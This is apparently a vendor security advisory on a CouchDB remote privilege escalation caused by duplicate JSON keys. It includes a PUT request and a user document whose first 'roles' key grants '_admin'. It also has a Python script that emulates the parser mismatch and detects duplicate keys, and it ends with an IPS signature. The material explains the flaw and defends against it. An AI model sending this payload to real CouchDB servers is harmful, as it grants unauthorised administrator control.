Apache CouchDB JSON Remote Privilege Escalation
Apache CouchDB is open source database software that focuses on ease of use and having a scalable architecture. It has a document-oriented NoSQL database architecture and is implemented in the concurrency-oriented language Erlang; it uses JSON to store data, JavaScript as its query language using MapReduce, and HTTP for an API.
A privilege escalation vulnerability exists in CouchDB. The vulnerability is due to a discrepancy in the behaviours of the JavaScript JSON parser, used in design documents, and the Jiffy JSON parser, used within the CouchDB Erlang-based internals, which allows an attacker to bypass the user access control.
Vulnerability details
CouchDB has its own web interface for interaction with the REST API. Both interfaces listen on port 5984/TCP by default. The URL for opening its GUI is: http://
To send an API request, a user sends an HTTP request such as the following, carrying the parameters in a JSON body. For example:
PUT /_users/org.couchdb.user:new_user HTTP/1.1
Host: localhost:5984
Content-Type: application/json
Content-Length: 80
{
"type": "user",
"name": "[username]",
"roles": [],
"password": "[password]"
}
When a JSON object has duplicate keys, a JavaScript JSON parser assigns only the last value. For example, the JSON {"key":"value1","key":"value2"} assigns value2 to key. When CouchDB handles such an API request, the JavaScript function validate_doc_update() is called to verify the current user's privilege, and it therefore sees the last value of a duplicated key. However, the Erlang internals use the get_value() function, which returns only the first value of a given key. Because of this difference, a document can pass validation on the last value while the first value is the one actually stored:
{
"type": "user",
"name": "[username]",
"roles": ["_admin"],
"roles": [],
"password": "[password]"
}
Such a request submits a malicious document to the _users or _replicator databases and escalates the user's privilege to server admin of CouchDB.
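The following Python script is an added illustration of the parser discrepancy described above and of the check that closes it; it is not code from the advisory or from CouchDB. It emulates the two parser behaviours with json.loads and an object_pairs_hook (last-wins for the JavaScript validator, first-wins for get_value() over Jiffy's output), runs the duplicate-"roles" document through a simplified stand-in for validate_doc_update(), and shows a strict parser that rejects any document carrying duplicate keys, which is the behaviour a proxy, WAF or application layer should enforce before such a document reaches the database. The sample document, the validate_user_doc() stand-in and the is_admin flag are constructed for the example.

```python
import json


class DuplicateKeyError(ValueError):
    """Raised by parse_strict() when an object repeats a key."""


# Constructed sample: the duplicate-"roles" user document from the advisory,
# with placeholder name and password values.
SAMPLE_DOC = """{
  "type": "user",
  "name": "new_user",
  "roles": ["_admin"],
  "roles": [],
  "password": "placeholder-password"
}"""


def parse_last_wins(text):
    """Mirror JSON.parse() in the JavaScript validator: the last duplicate wins."""
    return json.loads(text)


def parse_first_wins(text):
    """Mirror get_value() over Jiffy's key/value list: the first duplicate wins."""
    def first_wins(pairs):
        obj = {}
        for key, value in pairs:
            obj.setdefault(key, value)  # keep the first occurrence only
        return obj
    return json.loads(text, object_pairs_hook=first_wins)


def parse_strict(text):
    """Reject any object, at any nesting level, that contains a duplicate key."""
    def check(pairs):
        seen = set()
        for key, _ in pairs:
            if key in seen:
                raise DuplicateKeyError(f"duplicate key {key!r}")
            seen.add(key)
        return dict(pairs)
    return json.loads(text, object_pairs_hook=check)


def validate_user_doc(doc, is_admin):
    """Simplified stand-in for the _users validate_doc_update() rule:
    only a server admin may assign roles to a user document."""
    if not is_admin and doc.get("roles"):
        return False
    return True


def effective_roles(text, is_admin=False):
    """Emulate the vulnerable pipeline: validate on the last-wins view,
    then store the first-wins view. Returns the stored roles, or None
    when validation rejected the document."""
    if not validate_user_doc(parse_last_wins(text), is_admin):
        return None
    return parse_first_wins(text)["roles"]


def has_duplicate_keys(text):
    """Defensive check: True when the document repeats a key anywhere."""
    try:
        parse_strict(text)
    except DuplicateKeyError:
        return True
    return False


if __name__ == "__main__":
    print("validator sees roles:", parse_last_wins(SAMPLE_DOC)["roles"])
    print("internals store roles:", parse_first_wins(SAMPLE_DOC)["roles"])
    print("stored roles for a non-admin:", effective_roles(SAMPLE_DOC))
    print("duplicate keys detected:", has_duplicate_keys(SAMPLE_DOC))
```

Running the script shows the validator accepting the document because it sees an empty roles list, while the first-wins view stores ["_admin"]; has_duplicate_keys() flags the same document before either parser is trusted.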
SonicWall Capture Labs Threat Research team has developed the following signature to identify and stop the attacks:
- IPS 13106: Apache CouchDB JSON Remote Privilege Escalation